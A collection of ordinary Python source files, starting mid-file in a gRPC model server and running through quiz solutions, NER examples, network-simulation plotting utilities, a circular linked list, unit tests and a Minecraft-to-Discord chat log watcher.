'pod_name')\r\n model_env['status_exporter_sleep_time'] = os.environ.get('STATUS_EXPORTER_SLEEP_TIME', 60)\r\n return model_env\r\n\r\n def createhealthstatuslog(self):\r\n if self.model_env['models_health_base_path'] != '/':\r\n self.pod_health_status_path = '{}/health/{}'.format(self.model_env['models_health_base_path'],\r\n self.model_env['model_container_id'])\r\n\r\n def __init__(self):\r\n self.model_health_status = None\r\n self.pod_health_status_path = None\r\n self.model_env = self.read_env()\r\n self.createhealthstatuslog()\r\n\r\n def start(self, model, port):\r\n LOG.info(\"Starting gRPC Server\")\r\n model_env = self.read_env()\r\n servicer = Servicer()\r\n servicer.model = model\r\n# servicer.pod_health_status_path = self.pod_health_status_path\r\n servicer.model_env = model_env\r\n\r\n server = 
grpc.server(futures.ThreadPoolExecutor(max_workers=10))\r\n\r\n tensorflow__serving_dot_apis_dot_prediction_service__pb2. \\\r\n add_PredictionServiceServicer_to_server(servicer, server)\r\n\r\n# healthcheck_dot_healthcheck__pb2__grpc. \\\r\n# add_HealthServicer_to_server(servicer, server)\r\n\r\n# with open('{}/{}.json'.format(self.pod_health_status_path, self.model_env['model_container_pod_name'])) as outfile:\r\n# LOG.info('Reading Container Health Status file %s', str(self.pod_health_status_path))\r\n# LOG.debug(\"Json file content %s \",str(outfile))\r\n# self.model_health_status = json.load(outfile)\r\n\r\n server.add_insecure_port(\"[::]:%s\" % port)\r\n server.start()\r\n LOG.info('Server started successfully on port: %s ...', str(port))\r\n LOG.info('Enjoy!')\r\n\r\n if self.pod_health_status_path:\r\n healthexporter = AsyncWrite(model_env, self.get_model_health_status(),\r\n self.pod_health_status_path)\r\n healthexporter.start()\r\n healthexporter.join()\r\n\r\n try:\r\n while True:\r\n time.sleep(_ONE_DAY_IN_SECONDS)\r\n except KeyboardInterrupt:\r\n server.stop(0)\r\n","sub_path":"mlfmodelserver/grpc_server.py","file_name":"grpc_server.py","file_ext":"py","file_size_in_byte":16937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"236868071","text":"# submitted to info@codingthematrix.com\n\n# 2.9.4 quiz\ndef list_dot(u, v):\n return sum([a * b for (a, b) in zip(u, v)])\n\n# 2.9.15 quiz book answer\ndef dot_product_list(needle, haystack):\n s = len(needle)\n return [list_dot(needle, haystack[i:i+s])\n for i in range(len(haystack) - s)]\n\n# 2.9.15 corrected to address off-by-one error (\"s + 1\")\ndef dot_product_list_corrected(needle, haystack):\n s = len(needle)\n return [list_dot(needle, haystack[i:i+s])\n for i in range(len(haystack) - s + 1)]\n\n\"\"\"\nCalculates the result based on the \"is_original\" boolean \n\nOutput: \n{quiz} [Original|Corrected] {answer} == {result}: {result == answer} \n\"\"\"\ndef print_result(is_original, quiz, needle, haystack, answer):\n result = dot_product_list(needle, haystack) if is_original \\\n else dot_product_list_corrected(needle, haystack)\n print((\"{0} \" + (\"Original\" if is_original else \"Corrected\") + \" {1} == {2}: {3}\")\n .format(quiz, answer, result, result == answer))\n\n\nif __name__ == \"__main__\":\n haystack_2_9_13 = [1, -1, 1, 1, 1, -1, 1, 1, 1]\n needle_2_9_13 = [1, -1, 1, 1, -1, 1]\n answer_2_9_13 = [2, 2, 0, 0]\n print_result(True, \"2.9.13\", needle_2_9_13, haystack_2_9_13, answer_2_9_13)\n print_result(False, \"2.9.13\", needle_2_9_13, haystack_2_9_13, answer_2_9_13)\n\n haystack_2_9_14 = [1, 2, 3, 4, 5, 6]\n needle_2_9_14 = [1, 2, 3]\n answer_2_9_14 = [14, 20, 26, 32]\n print_result(True, \"2.9.14\", needle_2_9_14, haystack_2_9_14, answer_2_9_14)\n print_result(False, \"2.9.14\", needle_2_9_14, haystack_2_9_14, answer_2_9_14)\n\n\n","sub_path":"chapter/2/quiz_2_9_15_errata.py","file_name":"quiz_2_9_15_errata.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"367532328","text":"import collections\n\n\nclass Solution:\n def countPairs(self, a) -> int:\n mod = 10 ** 9 + 7\n power2 = [2 ** i for i in range(41)]\n count = collections.Counter(a)\n res = 0\n for k in count:\n for p in power2:\n if k == p - k:\n res += (count[k] * (count[k] - 1) // 2) % mod\n elif k < p - k:\n res += (count[k] * count.get(p - k, 0)) % mod\n return res\n\n\ns = 
Solution()\nprint(s.countPairs([1, 3, 5, 7, 9]))\nprint(s.countPairs([1, 1, 1, 3, 3, 3, 7]))\n","sub_path":"leetcode/2021/contest/weekly-222/Contest2.py","file_name":"Contest2.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"331482328","text":"# Distinct primes factors\nfrom time import time\n\nstart = time()\n\n\ndef pfactors(n):  # returns the prime-power factors of n\n    pfs = []\n    p = 2\n    while p * p <= n:\n        if not n % p:\n            if len(pfs) > 0 and not pfs[-1] % p:\n                pfs[-1] *= p\n            else:\n                pfs.append(p)\n            n //= p\n        elif p == 2:\n            p += 1\n        else:\n            p += 2\n    if n > 1:\n        if len(pfs) > 0 and not pfs[-1] % n:\n            pfs[-1] *= n\n        else:\n            pfs.append(n)\n    return pfs\n\n\ndef e47():\n    n = 123845  # 16th prime is 53, so here is the middle: 47*31*17*5, and it's 10 times faster\n    total = 0\n    while total < 4:\n        pfsn = pfactors(n)\n        if not len(pfsn) % 4:\n            total += 1\n        else:\n            total = 0\n        n += 1\n    return n - 4\n\n\nprint(e47())  # 134043\nprint('Runtime =', time() - start)\n","sub_path":"euler47_Distinct_primes_factors.py","file_name":"euler47_Distinct_primes_factors.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"609186356","text":"import asyncio\nimport re\nfrom c2dh_nerd.ner.flair import FlairNer\nfrom c2dh_nerd.util.routes import json_dumps\nfrom spacy.lang.en import English\n\nTEXT = '''\nLe président de la République a convié le nouveau premier ministre britannique à une visite en France, indique une source à l'Élysée.\n\nEmmanuel Macron et Boris Johnson, élu mardi 23 juillet à la tête du Parti conservateur et successeur désigné de Theresa May à la tête du gouvernement britannique, s'entretiendront du Brexit dans les prochaines semaines, «dans le respect des exigences de l'Union européenne», a indiqué une source à l'Élysée.\n'''\n\nsentence_splitter = English()\nsentence_splitter.add_pipe(sentence_splitter.create_pipe(\"sentencizer\", {\"punct_chars\": [\".\", \"!\", \"?\", \";\"]}))\n\ndef text_to_sentences(text):\n    if (len(text.strip()) == 0):\n        return []\n\n    doc = sentence_splitter(text)\n    return [s.text for s in doc.sents]\n\n\n\nsentences = text_to_sentences(TEXT)\n\nner_en = FlairNer(model_name='ner')\nner_fr = FlairNer(model_name='fr-ner')\nner_mul = FlairNer(model_name='ner-multi')\n\ndef normalise_entity(e):\n    return re.sub(r'^[^0-9a-zA-Z]*(.+?)[^0-9a-zA-Z]*$', r'\\\1', str(e))\n\nasync def main():\n    for s in sentences:\n        print(s)\n\n    for ner, label in [(ner_en, 'en'), (ner_fr, 'fr'), (ner_mul, 'multilang')]:\n        print(f'NER {label}:')\n\n        result = await ner.extract(sentences)\n\n        for e in result.entities:\n            print(f\"{e.tag}: {normalise_entity(e.entity)} = {e.score}\")\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main())\nloop.close()\n\n","sub_path":"examples/flair_ner.py","file_name":"flair_ner.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"474114667","text":"# -*- coding: UTF-8 -*-\nimport logging\n\n\nclass LogUtil:\n\n    def __init__(self, filename):\n        self.filename = filename\n\n    def logger(self):\n        # Create a logger\n        logger = logging.getLogger(\"logger\")\n        logger.setLevel(logging.ERROR)\n        # Create a file handler\n        # The path and file name must be filled in correctly; joined together they name the log file that gets written\n        handler = logging.FileHandler(filename=self.filename)\n        # Set the log level\n        handler.setLevel(logging.ERROR)\n        # Create a log formatter\n        formats = logging.Formatter('%(asctime)s %(levelname)s: %(message)s',\n                                    datefmt='[%Y/%m/%d %I:%M:%S]')\n        # Attach the formatter to the handler\n        handler.setFormatter(formats)\n        # Attach the handler to the logger\n        # NOTE: logging.getLogger(\"logger\") returns the same instance on every\n        # call, so invoking logger() repeatedly stacks duplicate handlers\n        logger.addHandler(handler)\n        return logger\n
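\n\n# Hypothetical usage (sketch only; the file name and the url variable are assumptions):\n#   log = LogUtil('itnest_spider_errors.log').logger()\n#   log.error('failed to parse page: %s', url)\n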
","sub_path":"itnest_spider/utils/log_utils.py","file_name":"log_utils.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"142019564","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport networkx as nx\nimport string\n\nfrom matplotlib.widgets import Slider\nfrom matplotlib import gridspec\nfrom statistics import mean, stdev\n\n\nclass LinkedPlotter:\n    \"\"\"\n    Plots a graph and line plots in user-specified axes.\n\n    There is a one-to-one pairing between nodes in the graph and curves provided, such that if a user hovers their mouse\n    over one of the nodes, the corresponding curve in the line plots will be outlined. Furthermore, each node in the\n    graph is colored according to its contribution at time-step k, where k is chosen via a slider in the bottom of the\n    figure.\n\n    Params:\n        graph: Graph to be plotted.\n        curves: List of curves to be plotted. Each element is a list [xs, ys], where xs and ys are respectively a list\n        of the x and y coordinates of the points to be plotted.\n        ax_graph: The axis in which the graph should be plotted.\n        ax_curves: The axis in which the curves should be plotted.\n    \"\"\"\n    def __init__(self, graph, curves, ax_graph, ax_curves, fig, circle=True, country=None):\n        plt.subplots_adjust(left=0.25, bottom=0.25)\n        self.curves = curves\n        self.ax_graph = ax_graph\n        self.ax_curves = ax_curves\n        self.fig = fig\n\n        # Plot graph, nodes are color-coded\n        colors = [curve[1][-1] for curve in self.curves]\n\n        if country is not None:\n            # Plot country as letters\n            assert len(list(string.ascii_lowercase)) >= len(country), 'More countries than letters in the alphabet'\n            mapping = {}\n            labeled = False\n            for a, letter in zip(country, list(string.ascii_lowercase)[:len(country)]):\n                for i in a:\n                    mapping[i] = letter\n            pos = nx.circular_layout(graph)\n            nx.draw_networkx(graph, with_labels=labeled, ax=ax_graph, node_color=colors, vmin=0, vmax=100, pos=pos)\n            nx.draw_networkx_labels(graph, labels=mapping, ax=ax_graph, pos=pos)\n        \n        sizes = [graph.degree(i)*10 for i in range(graph.order())]\n        if circle:\n            # Plots nodes in a circle: specially good for the small-world but also looks good for scale-free\n            nx.draw_circular(graph, with_labels=False, ax=ax_graph, node_size=sizes, node_color=colors, vmin=0, vmax=100)\n        elif country is None:\n            # Plots nodes so that the graph is visualized better and sometimes can be good for identifying clusters\n            nx.draw_kamada_kawai(graph, with_labels=False, ax=ax_graph, node_size=sizes, node_color=colors, vmin=0, vmax=100)\n\n\n        # Plot curves\n        self.lines = []\n        for curve in self.curves:\n            line, = self.ax_curves.plot(curve[0], curve[1])  # curve: [xs, ys]\n            self.lines.append(line)\n        n_sim_steps = len(self.curves[0][0])\n        self.ax_curves.set_xlim([-0.1, n_sim_steps-1])\n\n\n        # Save current curves colors and zorders for later 'hover off' update\n        self.colors = []\n        self.zorders = []\n        for line in self.lines:\n            self.colors.append(line.get_color())\n            self.zorders.append(line.get_zorder())\n\n        self.fig.canvas.mpl_connect(\"motion_notify_event\", self.hover)\n        self.needs_refresh_on_hover_off = False\n\n        # Create a slider for the simulation steps (for node coloring)\n        ax_slider = plt.axes([0.25, 0.1, 0.65, 0.03], facecolor='white')\n        self.slider = 
Slider(ax_slider, 'Simulation step', 0, n_sim_steps-1, valinit=n_sim_steps, valstep=1)\n self.slider.on_changed(self.update_node_colors)\n\n # Add guiding curve to curves plot\n self.guiding_curve = self.ax_curves.axvline(n_sim_steps-1, linestyle='--', color='r')\n\n def update_node_colors(self, value):\n # Update color of each node in the graph\n pc = self.ax_graph.collections[0]\n cmap = pc.cmap\n min_v, max_v = pc.get_clim()\n new_colors = np.array([curve[1][int(value)] for curve in self.curves])\n percents = np.clip((new_colors - min_v) / (max_v - min_v), 0, 1)\n pc.set_color(cmap(percents))\n\n # Adjust guiding curve x-position\n self.guiding_curve.set_xdata([value, value])\n\n self.fig.canvas.draw_idle()\n\n def update_curve_colors(self, ind):\n for i, l in enumerate(self.lines):\n if i in ind['ind']:\n l.set_color('r')\n l.set_zorder(max(self.zorders)+1)\n else:\n l.set_color('lightgray')\n self.needs_refresh_on_hover_off = True\n\n def hover(self, event):\n if event.inaxes == self.ax_graph:\n cont, ind = self.ax_graph.collections[0].contains(event)\n if cont:\n self.update_curve_colors(ind)\n self.fig.canvas.draw_idle()\n elif self.needs_refresh_on_hover_off:\n for line, color, zorder in zip(self.lines, self.colors, self.zorders):\n line.set_color(color)\n line.set_zorder(zorder)\n self.fig.canvas.draw_idle()\n self.needs_refresh_on_hover_off = False\n\n\n# Example usage\nif __name__ == '__main__':\n seed = 1\n np.random.seed(seed)\n\n # Generate graph\n G = nx.watts_strogatz_graph(15, 4, 0.3, seed=seed)\n xs = [i for i in range(10)]\n ys = [[x**2*j for x in xs] for j in range(15)]\n\n # Generate curves\n curves = []\n for y in ys:\n curves.append([xs, y])\n\n # Create figure and plot\n f, ax = plt.subplots(nrows=2)\n linked_plotter = LinkedPlotter(G, curves, ax[0], ax[1], f)\n plt.show()\n\n\ndef avgPlotter(graph, contribution_curves, mean_contribs, ax_degree, ax_avg, box_plot=False, median=True, log_scale=True, size_marker=5, network=\"\"):\n \"\"\"\n Generates a scatter plot of the mean contribution vs the number of neighbours (with error bars) if box_plot is set\n to False (default) or a boxplot if it is set to True. And also a plot (with error regions) for the average contribution\n over time\n\n Params:\n graph: Graph to be plotted.\n contribution_curves: List of contribution curves. 
Each element is a list [xs, ys], where xs and ys are respectively a list\n of the x and y coordinates of the points to be plotted.\n mean_contribs: mean contribution over time (first row) with standard deviation (second row)\n ax_degree: The axis in which the scatter plot should be plotted.\n ax_avg: The axis in which the average contribution should be plotted.\n \"\"\"\n\n # Plot scatter\n contributions = [y[len(y) - 1] for _, y in contribution_curves]\n degree = [graph.degree(i) for i in range(graph.order())]\n existing_degrees = [d for d in sorted(set(degree))]\n min_degree = min(degree)\n max_degree = max(degree)\n ordered_contribs = [[] for i in range(len(existing_degrees))]\n for idx in range(len(degree)):\n ordered_contribs[existing_degrees.index(degree[idx])].append(contributions[idx])\n if box_plot:\n ax_degree.boxplot(ordered_contribs, positions=existing_degrees)\n elif median:\n median_contribs_degree = [np.median(ordered_contribs[i]) for i in range(len(existing_degrees))]\n error_bars = np.zeros((2, len(existing_degrees)))\n error_bars[0, :] = [median_contribs_degree[i] - np.percentile(ordered_contribs[i], 25) for i in range(len(existing_degrees))]\n error_bars[1, :] = [np.percentile(ordered_contribs[i], 75) - median_contribs_degree[i] for i in range(len(existing_degrees))]\n\n size_marker = [len(ordered_contribs[i]) * size_marker for i in range(len(existing_degrees))]\n ax_degree.scatter(existing_degrees, median_contribs_degree, s=size_marker)\n ax_degree.errorbar(existing_degrees, median_contribs_degree, error_bars,\n alpha=0.5, linestyle='--')\n else:\n mean_contribs_degree = [mean(ordered_contribs[i]) for i in range(len(existing_degrees))]\n std_mean_contribs_degree = []\n for i in range(len(existing_degrees)):\n if len(ordered_contribs[i]) > 1:\n std_mean_contribs_degree.append(stdev(ordered_contribs[i]) / np.sqrt(len(ordered_contribs[i])))\n else:\n std_mean_contribs_degree.append(0)\n\n size_marker = [len(ordered_contribs[i])*size_marker for i in range(len(existing_degrees))]\n ax_degree.scatter(existing_degrees, mean_contribs_degree, s=size_marker)\n ax_degree.errorbar(existing_degrees, mean_contribs_degree, std_mean_contribs_degree,\n alpha=0.5, linestyle='--')\n\n if log_scale:\n ax_degree.set_xscale('log')\n\n\n # Plot avg. 
contribution\n    mean_color = (np.random.rand(), np.random.rand(), np.random.rand(), 0.3)\n    if network == \"WS\":\n        mean_color = \"green\"\n    elif network == \"BA\":\n        mean_color = \"orange\"\n    elif network == \"FB\":\n        mean_color = \"blue\"\n    x = list(range(len(mean_contribs[0, :])))\n    ax_avg.plot(mean_contribs[0, :], color=mean_color)\n    plt.fill_between(x, (mean_contribs[1, :]), (mean_contribs[2, :]), color=mean_color, alpha=0.3, edgecolor=None)\n    plt.ylim(0, 100)\n\n\ndef changePlotter(graph, contribution, rounds, args, titles=None, y_labels=None, cols=5):\n    \"\"\"\n    Generate plot of changes to network graph.\n\n    Params:\n        graph: Graph to be plotted.\n        contribution: Array of contributions with shape (rounds, player).\n        rounds: List of rounds to be plotted.\n        args: Argparse arguments.\n        titles: Titles for each of the graphs.\n        y_labels: Labels per row.\n        cols: Number of columns.\n\n    \"\"\"\n    sizes = [graph.degree(i)*10 for i in range(graph.order())]\n    if not titles:\n        titles = [f\"Round: {i}\" for i in rounds]\n\n    # Dynamics subplot to show development of the network\n    N = len(rounds)\n    cols = cols\n    rows = N // cols + 1 if N % cols else N // cols\n\n    gs = gridspec.GridSpec(rows, cols)\n    fig = plt.figure(figsize=(1.2*rows*6, 1.2*cols))\n    for i in range(N):\n        ax = fig.add_subplot(gs[i])\n        ax.set_title(titles[i])\n        \n        colors = contribution[rounds[i],:]\n        if args.network == \"WS\":\n            nx.draw_circular(graph, with_labels=False, ax=ax, node_size=sizes, node_color=colors, vmin=0, vmax=100)\n        elif args.network == \"BA\":\n            nx.draw_kamada_kawai(graph, with_labels=False, ax=ax, node_size=sizes, node_color=colors, vmin=0, vmax=100)\n\n        if y_labels:\n            # Custom y labels\n            ax.set_axis_on()\n            if i%cols==0:\n                ax.set_ylabel(y_labels[i//cols])\n            ax.tick_params(\n                axis='x',\n                which='both',\n                bottom=False,\n                top=False,\n                labelbottom=False)\n            ax.spines['right'].set_visible(False)\n            ax.spines['top'].set_visible(False)\n            ax.spines['left'].set_visible(False)\n            ax.spines['bottom'].set_visible(False)\n\n    \n    return plt\n","sub_path":"plot_utils.py","file_name":"plot_utils.py","file_ext":"py","file_size_in_byte":11085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"296146569","text":"import unittest\n\nimport numpy as np\n\nfrom lib.binary import iterate_binary_dataset\n\n\nclass BinaryTests(unittest.TestCase):\n    def test_data_set_consistency(self):\n        \"\"\"...Test binary datasets have the expected shape\n        \"\"\"\n        for name, x, y, n_observations, n_features in \\\n                iterate_binary_dataset():\n            self.assertEqual(x.shape[0], n_observations,\n                             \"Incorrect number of observations in %s\" % name)\n            self.assertEqual(y.shape[0], n_observations,\n                             \"Incorrect number of labels in %s\" % name)\n            self.assertEqual(x.shape[1], n_features,\n                             \"Incorrect number of features in %s\" % name)\n\n            self.assertEqual(set(np.unique(y)), {-1, 1},\n                             \"Incorrect labels encoding in %s\" % name)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"lib/tests/binary_test.py","file_name":"binary_test.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"264480081","text":"# -*- coding:utf-8 -*-\n'''\nA circular linked list is a singly linked list whose last node is linked back to the first node.\n\n* Advantage: both the last node and the first node can be reached in O(1) time. Also, when the list\nis not empty, no node holds None, so the program does not have to test for the None condition.\n\n* Caveat: visiting the nodes in the reverse direction is not easy, and care is needed because an\ninfinite loop can occur.\n'''\n\nclass CList:\n\n    # Node constructor: an item and a reference to the next node\n    class Node:\n        def __init__(self, item, link):\n            self.item = item\n            self.next = link\n    \n    # Circular linked list constructor: made up of last and the item count.\n    def __init__(self):\n        self.last = None\n        self.size = 0\n\n    def no_items(self): return self.size\n    def is_empty(self): return self.size == 0\n\n    def insert(self, item):\n        # Create a node to hold the new item, then handle the empty and non-empty cases separately.\n        n = self.Node(item, None)\n\n        if self.is_empty():\n            n.next = n\n            self.last = n\n        else:\n            n.next = self.last.next\n            self.last.next = n\n        \n        self.size += 1\n\n    def first(self):\n        if self.is_empty():\n            raise EmptyError('Underflow')\n        f = self.last.next\n        return f.item\n\n    # Delete the first node of the list.\n    # If there is exactly one node, set last to None.\n    # If there are two or more nodes, unlink the node that x points to.\n    def delete(self):\n        if self.is_empty():\n            raise EmptyError('Underflow')\n        x = self.last.next\n        \n        if self.size == 1:\n            self.last = None\n        else:\n            self.last.next = x.next\n        self.size -= 1\n\n        return x.item\n\n    def print_list(self):\n        if self.is_empty():\n            print('list is empty')\n        else:\n            f = self.last.next\n            p = f\n            while p.next != f:\n                print(p.item, ' -> ', end='')\n                p = p.next\n            print(p.item)\n\nclass EmptyError(Exception):\n    pass
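\n\n# Usage sketch (assumption; the original module ships no demo):\n#   cl = CList()\n#   cl.insert(10); cl.insert(20); cl.insert(30)\n#   cl.print_list()   # 30 -> 20 -> 10, because insert() places items in front\n#   cl.delete()       # removes and returns 30, the current first item\n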
","sub_path":"CircularLinkedList/Circularlist.py","file_name":"Circularlist.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"423902856","text":"from evolve.commit import Commit\nfrom evolve.branch import Branch\n\n\nclass BranchNotFound(Exception):\n    pass\n\n\nclass BranchAlreadyExists(Exception):\n    pass\n\n\nclass NoCommonParent(Exception):\n    pass\n\n\nclass Repository(object):\n    def __init__(self):\n        self.commits = {'root': {'changelog': [], 'msg': 'root'}}\n        self.branches = {}\n        self.checkouts = {}\n    \n    def branch(self, branch_name, parent_branch_name=None):\n        if branch_name in self.branches:\n            raise BranchAlreadyExists(\"The branch %s already exists, use checkout()\" % branch_name)\n        \n        if parent_branch_name:\n            try:\n                self.branches[branch_name] = self.branches[parent_branch_name]\n            except KeyError:\n                raise BranchNotFound(\"Could not find the %s branch\" % parent_branch_name)\n        else:\n            self.branches[branch_name] = 'root'\n        return self.checkout(branch_name)\n    \n    def checkout(self, branch_name):\n        try:\n            commit_id = self.branches[branch_name]\n        except KeyError:\n            raise BranchNotFound(\"Could not find the %s branch\" % branch_name)\n        \n        try:\n            commit = self.checkouts[commit_id]\n        except KeyError:\n            commit = Commit(self)\n            commit.checkout(commit_id)\n            self.checkouts[commit_id] = commit\n        \n        branch = Branch(self, branch_name, commit)\n        return branch\n    \n    def find_common_parent(self, commit_one, commit_two):\n        \"\"\"Find the common parent between the two commits if one exists\"\"\"\n        one = Commit(self)\n        one.checkout(commit_one)\n        two = Commit(self)\n        two.checkout(commit_two)\n        listone = one.getAncestors()\n        listtwo = two.getAncestors()\n        def compare(a, b):\n            common = None\n            for index in range(len(a)):\n                if a[index] is not b[index]:\n                    return common\n                common = a[index]\n            return common\n        \n        if len(listone) < len(listtwo):\n            common = compare(listone, listtwo)\n        else:\n            common = compare(listtwo, listone)\n        \n        if not common:\n            raise NoCommonParent(\"The commits %s and %s do not share a common parent\" % (commit_one, commit_two))\n        \n        return common\n    \n    def migrate(self, 
commit_one, commit_two):\n \"\"\"Migrate from one commit to another\"\"\"\n parent = self.find_common_parent(commit_one, commit_two)\n c1 = Commit(self)\n c1.checkout(commit_one)\n c2 = Commit(self)\n c2.checkout(commit_two)\n log = c1.rollback(parent)\n log.extend(c2.rollforward(parent))\n return log","sub_path":"evolve/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"507308939","text":"import unittest\n\nimport numpy as np\nfrom ddt import ddt, unpack, data\n\nfrom lib.board import Board\n\n\n@ddt\nclass TestMethods(unittest.TestCase):\n\n def setUp(self):\n self.board = Board(height=10, width=8)\n\n def test_count_same_elements_next_to_each_other__5_in_row(self):\n a = np.array([1, 0, 1, 0, 0, 1, 1, 1, 1, 1])\n self.assertFalse(Board._has_enough_elements_in_row(a, 1, 6))\n self.assertTrue(Board._has_enough_elements_in_row(a, 1, 5))\n self.assertFalse(Board._has_enough_elements_in_row(a, 0, 4))\n self.assertFalse(Board._has_enough_elements_in_row(a, 0, 3))\n self.assertTrue(Board._has_enough_elements_in_row(a, 0, 2))\n\n @data(\n [(3, 5), (0, 2)],\n [(8, 3), (5, 0)],\n [(4, 4), (0, 0)]\n )\n @unpack\n def test_first_in_skew_upleft(self, pos, exp_pos):\n res = self.board.get_first_position_in_skew(pos, -1)\n self.assertEqual(res, exp_pos)\n\n @data(\n [(2, 7), (0, 9)],\n [(7, 8), (6, 9)],\n [(2, 4), (0, 6)],\n [(4, 5), (0, 9)]\n )\n @unpack\n def test_first_in_skew_downleft(self, pos, exp_pos):\n res = self.board.get_first_position_in_skew(pos, 1)\n self.assertEqual(res, exp_pos)\n","sub_path":"zad_03/tests/test_methods.py","file_name":"test_methods.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"32729919","text":"from os import SEEK_END, stat, linesep\nfrom pathlib import Path\nfrom re import search, split, findall\nfrom sys import exc_info\nfrom threading import Thread\nfrom time import sleep\nfrom traceback import print_exc\n\nfrom discord import Webhook, RequestsWebhookAdapter\n\nfrom config.init_config import Config, BotVars\n\n\nclass Watcher:\n _running = True\n _thread = None\n\n # Constructor\n def __init__(self, watch_file: Path, call_func_on_change=None, *args, **kwargs):\n self._cached_stamp = None\n self._filename: Path = watch_file\n self._call_func_on_change = call_func_on_change\n self._refresh_delay_secs = Config.get_cross_platform_chat_settings().refresh_delay_of_console_log\n self._args = args\n self._kwargs = kwargs\n\n # Look for changes\n def look(self):\n stamp = stat(self._filename).st_mtime\n if stamp != self._cached_stamp:\n temp = self._cached_stamp\n self._cached_stamp = stamp\n if self._call_func_on_change is not None and temp is not None:\n BotVars.watcher_last_line = self._call_func_on_change(file=self._filename,\n last_line=BotVars.watcher_last_line,\n *self._args, **self._kwargs)\n\n # Keep watching in a loop\n def watch(self):\n while self._running:\n try:\n # Look for changes\n sleep(self._refresh_delay_secs)\n self.look()\n except FileNotFoundError:\n print(f\"Watcher Error: File {self._filename} wasn't found!\")\n except UnicodeDecodeError:\n print(f\"Watcher Error: Can't decode strings from file '{self._filename.as_posix()}'\"\n \", check that minecraft server saves it in utf-8 encoding!\\n\"\n \"(Ensure you have '-Dfile.encoding=UTF-8' as one of the arguments \"\n \"to start the server in start script)\")\n 
except BaseException:\n                print(f\"Watcher Unhandled Error: {exc_info()[0]}\")\n                print_exc()\n\n    def start(self):\n        self._thread = Thread(target=self.watch, daemon=True)\n        self._thread.start()\n\n    def stop(self):\n        self._running = False\n        if self._thread is not None:\n            self._thread.join()\n            self._thread = None\n\n    def is_running(self):\n        return self._running\n\n\ndef create_watcher():\n    if BotVars.watcher_of_log_file is not None and BotVars.watcher_of_log_file.is_running():\n        BotVars.watcher_of_log_file.stop()\n\n    BotVars.watcher_of_log_file = Watcher(watch_file=Path(Config.get_selected_server_from_list().working_directory\n                                                          + \"/logs/latest.log\"),\n                                          call_func_on_change=_check_log_file)\n    if BotVars.webhook_chat is None:\n        BotVars.webhook_chat = \\\n            Webhook.from_url(url=Config.get_cross_platform_chat_settings().webhook_url,\n                             adapter=RequestsWebhookAdapter())\n\n\ndef _check_log_file(file: Path, last_line: str = None):\n    if Config.get_cross_platform_chat_settings().channel_id is None:\n        return\n\n    last_lines = _get_last_n_lines(file,\n                                   Config.get_cross_platform_chat_settings().number_of_lines_to_check_in_console_log,\n                                   last_line)\n    if len(last_lines) == 0:\n        return last_line\n\n    if last_line is None:\n        # On the first pass only the newest line is processed (kept as a one-element list)\n        last_lines = [last_lines[-1]]\n\n    for line in last_lines:\n        if search(r\"\\[Server thread/INFO]\", line) and search(r\"<([^>]*)> (.*)\", line) and \": <\" in line:\n            player_nick, player_message = search(r\"<([^>]*)>\", line)[0], \\\n                                          split(r\"<([^>]*)>\", line, maxsplit=1)[-1].strip()\n            if search(r\"@.+\", player_message):\n                split_arr = split(r\"@[^\\s]+\", player_message)\n                mentions = {i[1:].lower(): None for i in findall(r\"@[^\\s]+\", player_message)}\n                for guild in BotVars.bot_for_webhooks.guilds:\n                    # Check mention on user mention\n                    for member in guild.members:\n                        if member.name.lower() in mentions.keys():\n                            mentions[member.name.lower()] = member\n                        elif member.display_name.lower() in mentions.keys():\n                            mentions[member.display_name.lower()] = member\n                    # Check mention on role mention\n                    for role in guild.roles:\n                        if role.name.lower() in mentions.keys():\n                            mentions[role.name.lower()] = role\n                i = 1\n                for name, mention_obj in mentions.items():\n                    split_arr.insert(i, mention_obj.mention if mention_obj is not None else f\"@{name}\")\n                    i += 2\n                player_message = \"\".join(split_arr)\n\n            BotVars.webhook_chat.send(rf\"**{player_nick}** {player_message}\")\n\n    return last_lines[-1]\n\n\ndef _get_last_n_lines(file, number_of_lines, last_line):\n    list_of_lines = []\n    with open(file, 'rb') as read_obj:\n        read_obj.seek(-len(linesep), SEEK_END)\n        buffer = bytearray()\n        pointer_location = read_obj.tell()\n        while pointer_location >= 0:\n            read_obj.seek(pointer_location)\n            pointer_location = pointer_location - 1\n            new_byte = read_obj.read(1)\n            if new_byte == b'\\n':\n                decoded_line = buffer[::-1].decode().strip()\n                if decoded_line == last_line:\n                    return list(reversed(list_of_lines))\n                list_of_lines.append(decoded_line)\n                if len(list_of_lines) == number_of_lines:\n                    return list(reversed(list_of_lines))\n                buffer = bytearray()\n            else:\n                buffer.extend(new_byte)\n        if len(buffer) > 0:\n            list_of_lines.append(buffer[::-1].decode().strip())\n    return list(reversed(list_of_lines))\n
